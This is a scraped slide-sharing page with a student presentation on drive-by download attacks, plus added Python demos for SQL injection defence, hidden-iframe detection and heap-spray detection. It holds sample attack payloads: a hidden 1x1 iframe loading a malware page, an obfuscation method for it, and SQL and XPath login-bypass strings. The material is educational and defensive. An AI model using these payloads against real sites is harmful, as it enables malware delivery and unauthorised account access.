Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 

Dernier (20)

Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 

Drive by downloads-cns

1. Drive-By Downloads
  Presenter: Darakhshan Naz
  Teacher: Professor Dr. Muhammad Mubashir Khan
  04.05.2013

2. Agenda
  • Introduction
  • Mechanisms of Drive-by Download
  • General Detection Approach
  • Security Measures
  • Assessment & Conclusion

3. What is Drive-by Download?
  • A technique that involves:
    ◦ Intended downloads made without understanding the consequences, e.g. executables
    ◦ Unintended downloads, e.g. viruses, spyware
  • Can happen by:
    ◦ Visiting a website
    ◦ Viewing an email message
  • Installs malicious programs, termed malware
    ◦ Through malware, the attacker gets full or partial control of the victim’s system
4. Example Scenario: Drive-By Download!
  (1) The user opens a browser
  (2) Reads an email that contains a website link
  (3) The link attracts the user’s interest; the user clicks
  (4) Goes to the website, which has many links
  (5) Surfs every site but gets bored (no interest develops); closes the website
  (6) The attacker sends the user a spoofed email
  (7) The attacker sends malicious code to the user’s browser and exploits a vulnerability
  (8) The malicious code creates a connection between user and attacker
  (9) It downloads and installs its backdoor program
  (10) It steals all the user’s important files and compromises him over the network
  The user is completely unaware of the attack.
  Source of concept: Report "Defence against Drive-by Download" by the National Security Agency, US
5. Purpose of Drive-by Download
  • Provide a gateway to botnets.
  • Take advantage of vulnerabilities.
  • Steal personal or confidential information of the user.
  • Lead or redirect the user to other malicious websites and compromise him.

6. Mechanisms of Drive-by Download
  [Figure: Basic Concept of Drive-by Download Attack (Source: [1]); steps 1–4, grouped into Injection and Exploitation]
7. Injection
  • What is injection:
    ◦ The act of entering data into an application, bypassing its security controls, so as to change its behaviour in an unexpected way.
  • Reason for injection:
    ◦ Existence of vulnerabilities.
  • A drive-by download is initiated by the injection of malicious code into a database, application or server.
  • Ways of malicious code injection:
    ◦ Injection through iFrames
    ◦ SQL injection
    ◦ XPath injection

8. How and where to inject?
  [Figure (Source: http://www.malware-info.com/mal_faq_inject.html): SQL injection; XPath injection; injection through iFrames; malware placed directly on the web server]
9. Injection through iFrames
  • The most basic form of injected code is a malicious iFrame such as:

      <div style="visibility: hidden; position: absolute; top: 1">
        <iframe id="IFRAME" name="IFRAME"
                src="http://www.example.com/page_with_malware.htm"
                scrolling="no" width="1" height="1"
                vspace="0" hspace="0" frameborder="0">
        </iframe>
      </div>

  • This iFrame is present in the HTML of the requested web page.
  • Content from this source renders in an invisible 1 pixel x 1 pixel window.
  • Sometimes iFrames are present in an encoded form that looks normal. The process of encoding is known as "obfuscation".

10. Obfuscation
  • The process of disguising code through encoding.
  • The previous iFrame can be converted to a JavaScript Unicode string using any encoding tool.
  • Encoding tool: http://www.auditmypc.com/html-encoder.asp
  • On browsing the injected page, the JavaScript dynamically generates an iFrame.
  • This causes malicious content from a website controlled by the attacker to execute inside the requested web page.
11. Obfuscation
  • Obfuscated form of the iFrame: a <script type="text/javascript"> block that calls document.write('...') with the whole iFrame markup encoded as a JavaScript Unicode string.
12. SQL Injection
  • Bypasses the authentication process.
  • Provides access to data for a malicious user or attacker.
  • Example: in any user form page, if we enter
      Username: ' OR '1'='1
      Password: ' OR '1'='1
    then the web page will execute this query:
      SELECT * FROM Users WHERE Username='' OR '1'='1' AND Password='' OR '1'='1'
    The parameters always yield a logically true condition, so the authentication check passes and the attacker can get access to any account in the database.
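An added Python example (not from the slides) that runs slide 12's login check both ways against a constructed in-memory SQLite table: the string-spliced query that the slide's input defeats, beside the parameterised form that the same input cannot alter. The table, account names and the `login_*` function names are constructed for the demonstration.

```python
import sqlite3

def make_db():
    # Constructed sample data: two accounts in an in-memory Users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    db.executemany("INSERT INTO Users VALUES (?, ?)",
                   [("john", "test123"), ("alice", "s3cret")])
    return db

def login_vulnerable(db, username, password):
    # User input is spliced straight into the SQL text, as on slide 12. A quote in
    # the input terminates the literal and the rest becomes part of the WHERE clause.
    sql = ("SELECT Username FROM Users WHERE Username='" + username +
           "' AND Password='" + password + "'")
    return [row[0] for row in db.execute(sql)]

def login_safe(db, username, password):
    # Parameterised query: the values travel separately from the statement, so
    # quote characters in the input can never change the query's structure.
    sql = "SELECT Username FROM Users WHERE Username=? AND Password=?"
    return [row[0] for row in db.execute(sql, (username, password))]

def demo():
    db = make_db()
    payload = "' OR '1'='1"   # the slide's input, entered as both username and password
    return {
        "normal_vuln": login_vulnerable(db, "john", "test123"),
        "normal_safe": login_safe(db, "john", "test123"),
        "inject_vuln": login_vulnerable(db, payload, payload),  # every account matches
        "inject_safe": login_safe(db, payload, payload),        # no account matches
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```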
13. XPath Injection
  • Almost similar to SQL injection.
  • Now the target is an XML document.
  • Insecurity is caused by the injection of XPath queries or conditions through the web page.
  • Example:
    ◦ If a user has an account on a site with Username=John and Password=test123, then logically he will see only his own account.
    ◦ If the same user enters his username as John' or 1 = 1 with the same password, then the system will authenticate him and show him the entire XML document.

14. Mechanism of Drive-by Download
  [Figure: Basic Concept of Drive-by Download Attack (Source: [1]); steps 1–4, grouped into Injection and Exploitation]
15. Exploitation
  • What is exploitation:
    ◦ The act by an attacker of performing activities of his own choosing on the victim’s system after getting full or partial control.
  • Reasons for exploitation:
    ◦ Ignoring updates of installed applications.
    ◦ According to Secunia PSI, about 95.46% of users have one or more insecure applications.
    ◦ A newer version may correct one or more vulnerabilities in the installed application.
  • Vulnerabilities that are mostly exploited:
    ◦ Browser vulnerabilities
    ◦ Plugin vulnerabilities
    ◦ File format vulnerabilities

16. Types of Vulnerabilities
  • Browser vulnerability
    ◦ The attacker injects malicious code into the user’s browser and changes its settings without his knowledge.
  • Plugin vulnerability
    ◦ Plugins are provided by third parties and can be vulnerable; this may lead to buffer overflows, memory corruption issues and pointer overwrites.
  • File format vulnerability
    ◦ Attackers attach malware to Word, Excel or PDF files distributed through email or websites. The exploit occurs when the editing program opens them.
17. General Detection Approach
  • JavaScript-based malware seems difficult to detect and analyze.
  • Requires a comprehensive approach to detect both the root cause and the dynamic behaviour.
  • Specialized detection methods:
    ◦ CUJO [2]
      - Static + dynamic analysis of JavaScript
      - Detection through machine learning
    ◦ ARROW [8]
      - Creates regular expression signatures for the servers of malware distribution networks (MDNs).
      - Evaluates their effectiveness.
  • Here the generalized detection approach, the basic idea behind detection, will be discussed.

18. Step 1: Analysis of JS Redirection
  • For an effective detection approach, analysis of JavaScript is mandatory.
  • The user is victimized in two ways:
    ◦ Either he is directly exposed to a vulnerable site,
    ◦ or an attacker reaches him through a series of redirections.
  • Two approaches can be taken to investigate redirections:
    ◦ Instrumenting the JavaScript code (e.g. hooking document.location).
    ◦ Taking the browser’s history.
19. Step 2: JavaScript Deobfuscation
  • Most malicious JavaScript is in obfuscated (encoded) form.
  • Deobfuscation (conversion from complex form to simple form) can help to identify malicious code.
  • It is possible manually or through an automated tool.
  • Automated tools, e.g.:
    ◦ Developer Tools in Google Chrome.
    ◦ Microsoft Script Debugger or Editor.
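Slides 9–11 show the hidden 1x1 iFrame and its obfuscated document.write() form, and this step describes undoing that encoding. An added Python example (not from the slides) that does both on a constructed page: it decodes the Unicode-escaped document.write() argument as a browser would, then flags iframes that are hidden or sized 1x1. The page content, the iframe URL and the size threshold are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser

# Constructed sample (not from the slides): a page whose inline script writes the
# hidden 1x1 iframe of slide 9 as a JavaScript Unicode-escaped string (slides 10-11).
HIDDEN_IFRAME = ('<div style="visibility: hidden; position: absolute; top: 1">'
                 '<iframe src="http://www.example.com/page_with_malware.htm" '
                 'width="1" height="1" frameborder="0"></iframe></div>')
OBFUSCATED_PAGE = ('<html><body><p>Hello</p><script type="text/javascript">'
                   "document.write('" + "".join(f"\\u{ord(c):04X}" for c in HIDDEN_IFRAME)
                   + "');</script></body></html>")
SCRIPT = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
DOC_WRITE = re.compile(r"document\.write\(\s*(['\"])(.*?)\1\s*\)", re.S)

def deobfuscate(page):
    """Step 2: replace each inline script by the markup its document.write()
    calls emit, decoding \\uXXXX escapes the way the browser does at run time."""
    def expand(m):
        return "".join(lit.encode("ascii", "backslashreplace").decode("unicode_escape")
                       for _quote, lit in DOC_WRITE.findall(m.group(1)))
    return SCRIPT.sub(expand, page)

class HiddenIframeFinder(HTMLParser):
    """Reports iframes that are hidden, inside a hidden element, or sized <= 1x1."""
    def __init__(self):
        super().__init__()
        self.found, self.hidden = [], []   # hidden: one visibility flag per open element
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = "visibility:hidden" in style or "display:none" in style
        if tag == "iframe":
            tiny = all(self._px(a.get(k)) <= 1 for k in ("width", "height"))
            if hidden or tiny or any(self.hidden):
                self.found.append(a.get("src", ""))
        self.hidden.append(hidden)
    def handle_endtag(self, tag):
        if self.hidden:
            self.hidden.pop()
    @staticmethod
    def _px(value):
        try:
            return int(str(value).rstrip("px"))
        except ValueError:
            return 10**6       # missing or non-numeric size: not tiny

def find_hidden_iframes(page):
    # Deobfuscate first, then scan the generated markup for hidden iframe sources.
    finder = HiddenIframeFinder()
    finder.feed(deobfuscate(page))
    return finder.found
```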
20. Step 3: Detection of Memory Corruption
  • Most attacks corrupt memory.
  • The attacker tries to get into the browser and run his shellcode.
    ◦ Shellcode is a small piece of code through which the attacker gets control of the victim’s system.
  • The attacker then uses JavaScript to allocate a large number of strings for the shellcode.
  • These strings are not part of the real code; they exist only for the attacker’s memory allocation.
  • Detection of these strings can give an indication of shellcode.

21. Contd.
  • Detection of these strings can be done in two ways:
    ◦ Controlling and tracking string variables whenever they are created.
    ◦ For automated detection, the libemu library is used.
      - It scans from each character and, when it finds a sequence of valid instructions, it reports shellcode.
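An added Python example (not from the slides) of the first detection route from slides 20–21, tracking suspicious string creation statically: it scans JavaScript source for the allocation pattern the slides describe (a short repetitive %u-encoded seed, a string grown to a large size by self-doubling, and a loop filling an array with it) and reports each indicator. Both JavaScript samples and all thresholds are constructed for the demonstration; the "spray" sample contains only a placeholder string, no real code.

```python
import re

# Constructed JavaScript samples (not from the slides). The first allocates many
# large, highly repetitive strings in the pattern slides 20-21 describe; the
# second is ordinary page code that should produce no indicators.
SPRAY_JS = """
var pad = unescape("%u4141%u4141");
while (pad.length < 0x10000) pad += pad;
var blocks = new Array();
for (var i = 0; i < 200; i++) blocks[i] = pad + "CONSTRUCTED_PLACEHOLDER";
"""
BENIGN_JS = """
var greeting = "Welcome back, " + user.name + "!";
document.getElementById("banner").innerText = greeting;
"""

UNESCAPE = re.compile(r'unescape\(\s*"((?:%u[0-9A-Fa-f]{4})+)"\s*\)')
DOUBLING = re.compile(r"while\s*\(\s*(\w+)\.length\s*<\s*(0x[0-9A-Fa-f]+|\d+)\s*\)\s*\1\s*\+=\s*\1")
ARRAY_FILL = re.compile(r"for\s*\(.*?<\s*(\d+)\s*;.*?\)\s*(\w+)\[\s*\w+\s*\]\s*=")

def smallest_period(s):
    """Length of the shortest unit whose repetition forms s (len(s) if none)."""
    i = (s + s).find(s, 1)
    return i if 0 < i < len(s) else len(s)

def heap_spray_indicators(js):
    """Return the indicators found: a repetitive %u-encoded seed string, a string
    self-doubled to a large size, and a loop filling an array with copies."""
    indicators = []
    for enc in UNESCAPE.findall(js):
        units = re.findall(r"%u([0-9A-Fa-f]{4})", enc)
        if smallest_period("".join(units)) <= 4:      # e.g. one 16-bit unit repeated
            indicators.append(f"repetitive %u seed of {len(units)} units")
    for var, size in DOUBLING.findall(js):
        if int(size, 0) >= 0x1000:                     # grown to at least 4 KiB
            indicators.append(f"{var} doubled to >= {int(size, 0)} chars")
    for count, arr in ARRAY_FILL.findall(js):
        if int(count) >= 50:                           # many copies kept alive at once
            indicators.append(f"{arr} filled in a loop of {count} iterations")
    return indicators

if __name__ == "__main__":
    print(heap_spray_indicators(SPRAY_JS))   # three indicators
    print(heap_spray_indicators(BENIGN_JS))  # []
```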
22. Step 4: Investigation of Exploitation
  • Exploitation is the last step of a drive-by download attack; it takes advantage of vulnerabilities.
  • It can be detected in two ways:
    ◦ Analysis of the behaviour of browsers and plug-ins.
    ◦ Monitoring of strings passed as parameters and of method calls. Usually long strings are used in exploits, and certain methods are called when downloading malware.

23. Security Measures
  • Updating of software.
  • Installation of web-filtering software.
  • Implementation of BLADE (Block All Drive-by Download Exploits).
  • Proper management by network administrators.
  • Users should be careful while visiting sites, especially entertainment and social sites, as they may harbour adversaries.
  • Usage of reputed search engines like Google, Microsoft, Yahoo, AVG or Bing.
  • Usage of a virtual machine for web browsing.
24. The Good
  • Automated techniques (compiler or library) of deobfuscation are really helpful for the identification of malicious JavaScript.
  • Detection should be focussed on central points.
    ◦ EvilSeed [11] provides a crawling approach focussing on central points of malware.
  • Machine learning can provide lightweight JavaScript analysis, fast detection mechanisms and handling of vulnerabilities at runtime.
  • Proper input validation can reduce SQL and XPath injection.

25. The Bad
  • Can easily happen but is very hard to overcome.
  • Possibilities of attack are rapidly increasing, but the validity of detection approaches cannot be guaranteed every time.
  • A defensive approach is better for fighting these attacks, for two reasons:
    ◦ Intense dynamic behaviour.
    ◦ Complex and time-consuming detection approaches.

26. The Ugly
  • Mostly shows unexpected behaviour.
  • Due to the diversity of attack methods, it has a high ratio of victims, and it is difficult to design a detection approach that covers all possibilities.
  • No computing device seems to be safe from drive-by downloads.
  • As drive-by download attacks are increasing enormously, perhaps in the near future hard drive or portable device vulnerabilities may also exist.

27. Thanks for your attention
28. References (1)
  [1] Egele, M., Wurzinger, P., Kirda, E.: Defending Browsers against Drive-by Downloads: Mitigating Heap-Spraying Code Injection Attacks (2009).
  [2] Rieck, K., Krueger, T., Dewald, A.: CUJO: Efficient Detection and Prevention of Drive-by Download Attacks. Technische Universität Berlin.
  [3] Stone-Gross, B., Cova, M., Kruegel, C., Vigna, G.: Peering through the iFrame. University of California; University of Birmingham.
  [4] Westervelt, R.: Kaspersky website hacked (February 2009).
  [5] Cova, M., Kruegel, C., Vigna, G.: Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code. University of California, Santa Barbara. From the ACM Digital Library.
  [6] Interesting statistics from the Secunia PSI (January 2008). http://secunia.com/blog/18

29. References (2)
  [7] Lu, L., Yegneswaran, V., Porras, P.: BLADE: An Attack-Agnostic Approach for Preventing Drive-By Malware Infections. College of Computing, Georgia Institute of Technology; SRI International. From the ACM Digital Library.
  [8] Zhang, J., Seifert, C., Stokes, J.W., Lee, W.: ARROW: Generating Signatures to Detect Drive-By Downloads. Georgia Institute of Technology; Microsoft Bing; Microsoft Research.
  [9] Devi, D., Pathak, D., Nandi, S.: Vulnerabilities in Web Browsers. Indian Institute of Technology, Guwahati, India.
  [10] Provos, N., Mavrommatis, P., Moheeb, A. R., Monrose, F.: All Your iFrames Point to Us. Google Inc.; Johns Hopkins University.
  [11] Invernizzi, L., Benvenuti, S., Cova, M., Comparetti, P. M., Kruegel, C., Vigna, G.: EVILSEED: A Guided Approach to Finding Malicious Web Pages. 2012 IEEE Symposium on Security and Privacy.